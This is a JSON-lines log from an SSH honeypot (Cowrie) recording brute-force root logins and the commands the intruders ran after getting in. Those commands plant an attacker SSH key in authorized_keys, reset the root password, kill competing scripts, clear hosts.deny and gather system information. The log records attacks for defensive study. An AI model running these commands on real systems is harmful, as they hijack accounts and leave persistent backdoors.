{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43958,"dst_ip":"1.2.3.4","dst_port":22,"session":"051d355cd440","protocol":"ssh","message":"New connection: 212.227.235.229:43958 (1.2.3.4:22) [session: 051d355cd440]","sensor":"my-vps","timestamp":"2025-09-08T22:54:10.015367Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:54:10.016129Z","src_ip":"212.227.235.229","session":"051d355cd440"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:54:10.106687Z","src_ip":"212.227.235.229","session":"051d355cd440"}
{"eventid":"cowrie.login.success","username":"root","password":"Qq123456..","message":"login attempt [root/Qq123456..] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:54:10.509830Z","src_ip":"212.227.235.229","session":"051d355cd440"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:54:10.769457Z","src_ip":"212.227.235.229","session":"051d355cd440"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:54:10.770148Z","src_ip":"212.227.235.229","session":"051d355cd440"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:54:10.770937Z","src_ip":"212.227.235.229","session":"051d355cd440"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:54:10.862962Z","src_ip":"212.227.235.229","session":"051d355cd440"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:54:11.128836Z","src_ip":"212.227.235.229","session":"051d355cd440"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:54:11.129556Z","src_ip":"212.227.235.229","session":"051d355cd440"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:54:11.151513Z","src_ip":"212.227.235.229","session":"49ae08d656e5"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:54:11.152165Z","src_ip":"212.227.235.229","session":"49ae08d656e5"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:54:11.222374Z","src_ip":"212.227.235.229","session":"051d355cd440"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:54:11.223335Z","src_ip":"212.227.235.229","session":"051d355cd440"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43970,"dst_ip":"1.2.3.4","dst_port":22,"session":"5bfc92a008ff","protocol":"ssh","message":"New connection: 212.227.235.229:43970 (1.2.3.4:22) [session: 5bfc92a008ff]","sensor":"my-vps","timestamp":"2025-09-08T22:54:11.306146Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:54:11.307043Z","src_ip":"212.227.235.229","session":"5bfc92a008ff"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:54:11.390619Z","src_ip":"212.227.235.229","session":"5bfc92a008ff"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:54:11.403651Z","src_ip":"212.227.235.229","session":"49ae08d656e5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:54:11.404479Z","src_ip":"212.227.235.229","session":"49ae08d656e5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59914,"dst_ip":"1.2.3.4","dst_port":22,"session":"f93a0a9af193","protocol":"ssh","message":"New connection: 212.227.235.229:59914 (1.2.3.4:22) [session: f93a0a9af193]","sensor":"my-vps","timestamp":"2025-09-08T22:54:11.660812Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:54:11.661540Z","src_ip":"212.227.235.229","session":"f93a0a9af193"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:54:11.763785Z","src_ip":"212.227.235.229","session":"5bfc92a008ff"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:54:11.916776Z","src_ip":"212.227.235.229","session":"f93a0a9af193"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:54:12.849061Z","src_ip":"212.227.235.229","session":"5bfc92a008ff"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43978,"dst_ip":"1.2.3.4","dst_port":22,"session":"6e25ba4d140d","protocol":"ssh","message":"New connection: 212.227.235.229:43978 (1.2.3.4:22) [session: 6e25ba4d140d]","sensor":"my-vps","timestamp":"2025-09-08T22:54:12.930114Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:54:12.930851Z","src_ip":"212.227.235.229","session":"6e25ba4d140d"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:54:12.979923Z","src_ip":"212.227.235.229","session":"f93a0a9af193"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:54:13.013472Z","src_ip":"212.227.235.229","session":"6e25ba4d140d"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:54:13.385626Z","src_ip":"212.227.235.229","session":"6e25ba4d140d"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:54:13.469929Z","src_ip":"212.227.235.229","session":"051d355cd440"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:54:13.471021Z","src_ip":"212.227.235.229","session":"6e25ba4d140d"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:54:14.237630Z","src_ip":"212.227.235.229","session":"f93a0a9af193"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59920,"dst_ip":"1.2.3.4","dst_port":22,"session":"fba3a92d94c3","protocol":"ssh","message":"New connection: 212.227.235.229:59920 (1.2.3.4:22) [session: fba3a92d94c3]","sensor":"my-vps","timestamp":"2025-09-08T22:54:14.488874Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:54:14.490729Z","src_ip":"212.227.235.229","session":"fba3a92d94c3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:54:20.574383Z","src_ip":"212.227.235.229","session":"49ae08d656e5"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep name | wc -l","message":"CMD: cat /proc/cpuinfo | grep name | wc -l","sensor":"my-vps","timestamp":"2025-09-08T22:54:20.575078Z","src_ip":"212.227.235.229","session":"49ae08d656e5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99","size":2,"shasum":"3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:54:20.825946Z","src_ip":"212.227.235.229","session":"49ae08d656e5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:54:21.401168Z","src_ip":"212.227.235.229","session":"49ae08d656e5"}
{"eventid":"cowrie.command.input","input":"echo \"root:42LsJEa6wL9x\"|chpasswd|bash","message":"CMD: echo \"root:42LsJEa6wL9x\"|chpasswd|bash","sensor":"my-vps","timestamp":"2025-09-08T22:54:21.401916Z","src_ip":"212.227.235.229","session":"49ae08d656e5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/6b9a44fc0e81d9fd84882d4b79ac085b3bff39d234eb12bfe53b9c65eef53ea2","size":21,"shasum":"6b9a44fc0e81d9fd84882d4b79ac085b3bff39d234eb12bfe53b9c65eef53ea2","duplicate":false,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/6b9a44fc0e81d9fd84882d4b79ac085b3bff39d234eb12bfe53b9c65eef53ea2 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:54:21.653829Z","src_ip":"212.227.235.229","session":"49ae08d656e5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","size":483,"shasum":"4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:54:22.171234Z","src_ip":"176.65.149.186","session":"10577facea00"}
{"eventid":"cowrie.session.closed","duration":180.11743235588074,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:54:22.176485Z","src_ip":"176.65.149.186","session":"10577facea00"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:54:22.649476Z","src_ip":"212.227.235.229","session":"49ae08d656e5"}
{"eventid":"cowrie.command.input","input":"rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;","message":"CMD: rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;","sensor":"my-vps","timestamp":"2025-09-08T22:54:22.650202Z","src_ip":"212.227.235.229","session":"49ae08d656e5"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","shasum":"01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","destfile":"/etc/hosts.deny","message":"Saved redir contents with SHA-256 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b to var/lib/cowrie/downloads/01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","sensor":"my-vps","timestamp":"2025-09-08T22:54:22.902791Z","src_ip":"212.227.235.229","session":"49ae08d656e5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a","size":0,"shasum":"a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:54:22.903638Z","src_ip":"212.227.235.229","session":"49ae08d656e5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:54:23.505671Z","src_ip":"212.227.235.229","session":"49ae08d656e5"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'","message":"CMD: cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'","sensor":"my-vps","timestamp":"2025-09-08T22:54:23.506480Z","src_ip":"212.227.235.229","session":"49ae08d656e5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe","size":35,"shasum":"95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:54:23.758111Z","src_ip":"212.227.235.229","session":"49ae08d656e5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:54:24.275579Z","src_ip":"212.227.235.229","session":"49ae08d656e5"}
{"eventid":"cowrie.command.input","input":"free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'","message":"CMD: free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'","sensor":"my-vps","timestamp":"2025-09-08T22:54:24.276263Z","src_ip":"212.227.235.229","session":"49ae08d656e5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c","size":29,"shasum":"ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:54:24.527010Z","src_ip":"212.227.235.229","session":"49ae08d656e5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:54:25.126641Z","src_ip":"212.227.235.229","session":"49ae08d656e5"}
{"eventid":"cowrie.command.input","input":"ls -lh $(which ls)","message":"CMD: ls -lh $(which ls)","sensor":"my-vps","timestamp":"2025-09-08T22:54:25.127414Z","src_ip":"212.227.235.229","session":"49ae08d656e5"}
{"eventid":"cowrie.command.input","input":"which ls","message":"CMD: which ls","sensor":"my-vps","timestamp":"2025-09-08T22:54:25.128182Z","src_ip":"212.227.235.229","session":"49ae08d656e5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0","size":55,"shasum":"a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:54:25.381034Z","src_ip":"212.227.235.229","session":"49ae08d656e5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:54:25.947327Z","src_ip":"212.227.235.229","session":"49ae08d656e5"}
{"eventid":"cowrie.command.input","input":"crontab -l","message":"CMD: crontab -l","sensor":"my-vps","timestamp":"2025-09-08T22:54:25.948024Z","src_ip":"212.227.235.229","session":"49ae08d656e5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8","size":20,"shasum":"f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:54:26.198750Z","src_ip":"212.227.235.229","session":"49ae08d656e5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:54:26.714501Z","src_ip":"212.227.235.229","session":"49ae08d656e5"}
{"eventid":"cowrie.command.input","input":"w","message":"CMD: w","sensor":"my-vps","timestamp":"2025-09-08T22:54:26.715217Z","src_ip":"212.227.235.229","session":"49ae08d656e5"}
